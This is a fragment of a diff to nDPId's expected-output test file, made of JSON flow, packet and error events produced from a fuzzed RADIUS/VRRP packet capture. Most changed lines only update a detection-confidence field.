-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} -00704{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":140,"flow_first_seen":1528996068129,"flow_last_seen":1528998235241,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":62047,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997839322,"flow_last_seen":1528998013405,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00704{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":140,"flow_first_seen":1528996068129,"flow_last_seen":1528998235241,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":62047,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998238764,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01328{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1528998238764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528998238764,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIUFAAP8RAABYDFAexuIZNXIQBxQClwAAAY8CjztV4Oh\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"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998238764,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998238764,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998257171,"flow_last_seen":1528998257171,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998257171,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1528998257171,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998257171,"pkt":"AAAMB6xAABRP+4rqCABFAALbtPNAAP8RAAAKDEAexuIZPnIQBxQCxwAAAZQCv\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"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998257171,"flow_last_seen":1528998257171,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998257171,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998257171,"flow_last_seen":1528998257171,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998257171,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1528998257238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998257238,"pkt":"ABRP+4rqcNuYVcUnCABFAAClC51AAPwRSGDG4hk+CgxAHgcUchAAkfysC5QAiW3tOcJvsUMExQ3khIQf5JsBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MAI6NWYvMjM4Tw4BAAAMFwwAAAwBf\/xQEttbuyUYSqflHrLDivPrVrc="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":276,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":663,"global_ts_msec":1528998257392} 01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":276,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998257238,"pkt":"AAAMB6xAABRP+4rqCABFAAKrtPRAZP8RAAAKLEAexuIZPnIQBxQClwAAAZUCj2QnnzQfo5ejlXtjb\/umlWwaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1NwZbIqlxATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNib4OUAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTEwOlZlcml6b25XaTZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1528998257456,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528998257456,"pkt":"ABRP+4rqcNuYVcUnCABFAADAC6FAAPwRSEHG4hk+CgxAHgcUchAArH\/HA5UApDEA20uf1YbOtjZ3cBjhL8UBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjczExLjNncHBuZXR3b3JrLm9yZywwNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4EiIzMjc2NCBTdWJzY3JpYmVyIG53dCBwcm92aXNpb25lZE8HBAEABwBQEiTxEJAlgr8Mmnu4S7XiSkM="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1528998260755,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998260755,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1528998260831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998260831,"pkt":"ABRP+4rqcNuYVcUnCABFAAClC7JAAPwRSFTG4hk1ClJAHgcUchAAkW2jC5YAiay3x5utrN9ef0\/5StJEFS4BNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWUvZTA6NWY6NDU6OTA6MDk6NWYvMjM4Tw4BAAAMVwwAAAwBf\/xQEkJeR7D8c3a4+60+qxnUicM="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":280,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528998260959} 01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":280,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998260831,"pkt":"AAAMB6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":281,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2056,"global_ts_msec":1528998261024} 
@@ -362,7 +362,7 @@ 00528{"packet_event_id":1,"packet_event_name":"packet","packet_id":283,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":1528998279600,"pkt":"gBRP+yUAcNuYVcUnCABFADClC+NAAPsRSSPG4hk1CgxAHgcUchAAkf3TC5gAiaqvlSxwmtnYRSbHVUGZo3ABNTAzMTE0ODA0MzI2MDg1ODabd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5ODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5Tw4BAAAMFwwAAAwBf\/xQEnv5mqy\/X1rSPl3U34VdPzc="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01329{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1528998279797,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528998279797,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIUlAAP8RAAAKDEAexuJQNXIQBxQClwAAAZkCj3rtQEtjvnzCegZr\/ks\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"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998285403,"flow_last_seen":1528998285403,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998285403,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"14.12.64.30","src_port":3860,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
